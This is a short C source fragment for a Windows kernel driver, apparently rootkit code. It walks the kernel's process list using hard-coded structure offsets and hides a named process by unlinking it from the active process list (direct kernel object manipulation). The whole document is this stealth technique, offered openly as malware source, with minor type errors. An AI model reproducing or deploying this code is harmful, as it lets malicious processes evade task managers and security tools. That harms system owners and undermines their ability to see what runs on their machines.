/*
*  SearchByName - Search a Process by its name
*  input(1): char *ProcessName - Pointer to the Process Name string
*  input(2): int size - The Buffer size
*  output: CurrentProcess
*/
ULONG SearchByName(char *processName, int size)
{
  PEPROCESS CheckPoint, CurrentProcess;
  PLIST_ENTRY list;
  CheckPoint = IoGetCurrentProcess(); // We save the status of the Current Process
  CurrentProcess = CheckPoint;
  
  do
  { // Search all Process with the value <ProcessName>
    if (!strncmp(processName, ((PUCHAR) CurrentProcess + 0x174), size))
	  return CurrentProcess; // If the the field has the same value as the given process name, we return his pointer
	
    // Go to the next active Process
	list = (PLIST_ENTRY)((PUCHAR)CurrentProcess + 0x088);
	CurrentProcess = (PEPROCESS)list->Flink;
	CurrentProcess = (PEPROCESS)((PUCHAR)CurrentProcess - 0x088);
	
  } while (CheckPoint != CurrentProcess);
  
  return 0;
}
/*
*  HideProcess - Hide a Process by its name
*  input(1): char *ProcessName - Pointer to the Process Name string
*  input(2): int size - The Buffer size
*/
VOID HideProcess(char *processName, int size)
{
  PEPROCESS toHide;
  PLIST_ENTRY listtoHide;
  
  toHide = (PEPROCESS) SearchByName(processName, size);
  if (toHide == 0)
    return 0;
	
  listtoHide = (PLIST_ENTRY)((PUCHAR) toHide + 0x088);
  *((PDWORD) listtoHide->Blink) = (DWORD) listtoHide->Flink;
  *((PDWORD) (listtoHide->Flink)+1) = (DWORD) listtoHide->Blink;
  listtoHide->Blink = (PLIST_ENTRY)&listtoHide->Flink;
  listtoHide->Flink = (PLIST_ENTRY)&listtoHide->Flink;
}
